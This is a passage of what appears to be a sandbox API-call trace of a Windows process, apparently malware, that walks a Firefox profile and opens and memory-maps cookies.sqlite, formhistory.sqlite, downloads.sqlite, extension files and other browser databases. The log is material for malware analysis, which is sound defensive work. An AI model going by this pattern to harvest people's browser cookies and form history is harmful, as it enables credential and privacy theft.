lstrlenW (lpString="content-prefs.sqlite") returned 20 [0590.820] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.820] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63f8c8 [0590.820] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.820] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.821] CloseHandle (hObject=0x660) returned 1 [0590.821] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0590.821] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63fa18 [0590.821] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x63fa18, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite") returned 0x61 [0590.821] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.821] CloseHandle (hObject=0x660) returned 1 [0590.821] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.821] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38000 [0590.821] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.821] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.822] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.823] CloseHandle (hObject=0x668) returned 1 [0590.823] CloseHandle (hObject=0x660) returned 1 [0590.823] LocalFree (hMem=0x63fa18) returned 0x0 [0590.823] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.823] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.823] lstrlenW (lpString="\\") returned 1 [0590.823] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.823] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.823] lstrlenW (lpString="cookies.sqlite") returned 14 [0590.823] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.823] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.823] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.823] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.824] CloseHandle (hObject=0x660) returned 1 [0590.824] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.824] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbdf0 [0590.824] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x5dbdf0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite") returned 0x5b [0590.824] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.824] CloseHandle (hObject=0x660) returned 1 [0590.824] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.824] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80000 [0590.824] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.824] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.826] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.829] CloseHandle (hObject=0x668) returned 1 [0590.829] CloseHandle (hObject=0x660) returned 1 [0590.829] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.829] LocalFree (hMem=0x56cab0) returned 0x0 [0590.829] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.829] lstrlenW (lpString="\\") returned 1 [0590.829] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.829] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.829] lstrlenW (lpString="downloads.sqlite") returned 16 [0590.829] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.829] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56cab0 [0590.829] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.829] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.829] CloseHandle (hObject=0x660) returned 1 [0590.829] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0590.829] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbdf0 [0590.829] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x5dbdf0, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite") returned 0x5d [0590.829] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.829] CloseHandle (hObject=0x660) returned 1 [0590.829] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.829] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0590.829] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.830] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.830] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.831] CloseHandle (hObject=0x668) returned 1 [0590.831] CloseHandle (hObject=0x660) returned 1 [0590.831] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.831] LocalFree (hMem=0x56cab0) returned 0x0 [0590.831] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.831] lstrlenW (lpString="\\") returned 1 [0590.831] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.831] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.831] lstrlenW (lpString="extensions.ini") returned 14 [0590.831] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.831] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.831] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.831] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.831] CloseHandle (hObject=0x660) returned 1 [0590.831] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.831] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbdf0 [0590.831] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x5dbdf0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini") returned 0x5b [0590.831] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.831] CloseHandle (hObject=0x660) returned 1 [0590.831] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.831] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d [0590.831] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.831] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.832] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.832] CloseHandle (hObject=0x668) returned 1 [0590.832] CloseHandle (hObject=0x660) returned 1 [0590.832] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.832] LocalFree (hMem=0x56cab0) returned 0x0 [0590.832] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.832] lstrlenW (lpString="\\") returned 1 [0590.832] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.832] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.832] lstrlenW (lpString="extensions.sqlite") returned 17 [0590.832] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.832] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56cab0 [0590.832] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.832] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.832] CloseHandle (hObject=0x660) returned 1 [0590.832] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0590.832] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0590.832] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x5dbdf0, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite") returned 0x5e [0590.832] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.832] CloseHandle (hObject=0x660) returned 1 [0590.832] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.832] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x70000 [0590.832] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.832] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3680000 [0590.834] UnmapViewOfFile (lpBaseAddress=0x3680000) returned 1 [0590.837] CloseHandle (hObject=0x668) returned 1 [0590.837] CloseHandle (hObject=0x660) returned 1 [0590.837] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.837] LocalFree (hMem=0x56cab0) returned 0x0 [0590.837] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.837] lstrlenW (lpString="\\") returned 1 [0590.837] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.837] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.837] lstrlenW (lpString="formhistory.sqlite") returned 18 [0590.837] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.837] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56cab0 [0590.837] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.837] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.837] CloseHandle (hObject=0x660) returned 1 [0590.837] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0590.837] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x5dbdf0 [0590.837] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x5dbdf0, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite") returned 0x5f [0590.837] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.837] CloseHandle (hObject=0x660) returned 1 [0590.837] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.837] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30000 [0590.837] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.837] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.838] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.840] CloseHandle (hObject=0x668) returned 1 [0590.840] CloseHandle (hObject=0x660) returned 1 [0590.840] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.840] LocalFree (hMem=0x56cab0) returned 0x0 [0590.840] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.840] lstrcmpiW (lpString1="healthreport", lpString2=".") returned 1 [0590.840] lstrcmpiW (lpString1="healthreport", lpString2="..") returned 1 [0590.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.840] lstrlenW (lpString="\\") returned 1 [0590.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.840] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.840] lstrlenW (lpString="healthreport") returned 12 [0590.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.840] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.840] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0590.840] lstrlenW (lpString="\\*.*") returned 4 [0590.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0590.840] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbdf0 [0590.840] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*.*", lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0x5b9b50 [0590.840] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.840] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.840] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.840] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.840] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0 [0590.840] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.840] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.840] LocalFree (hMem=0x56cab0) returned 0x0 [0590.840] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.840] lstrlenW (lpString="\\") returned 1 [0590.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.840] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.840] lstrlenW (lpString="healthreport.sqlite") returned 19 [0590.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.840] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56cab0 [0590.840] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.840] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.840] CloseHandle (hObject=0x660) returned 1 [0590.840] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0590.840] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x5dbdf0 [0590.840] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x5dbdf0, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite") returned 0x60 [0590.840] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.840] CloseHandle (hObject=0x660) returned 1 [0590.841] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.841] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118000 [0590.841] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.841] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.849] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.851] CloseHandle (hObject=0x668) returned 1 [0590.851] CloseHandle (hObject=0x660) returned 1 [0590.851] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.851] LocalFree (hMem=0x56cab0) returned 0x0 [0590.851] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.851] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0590.851] 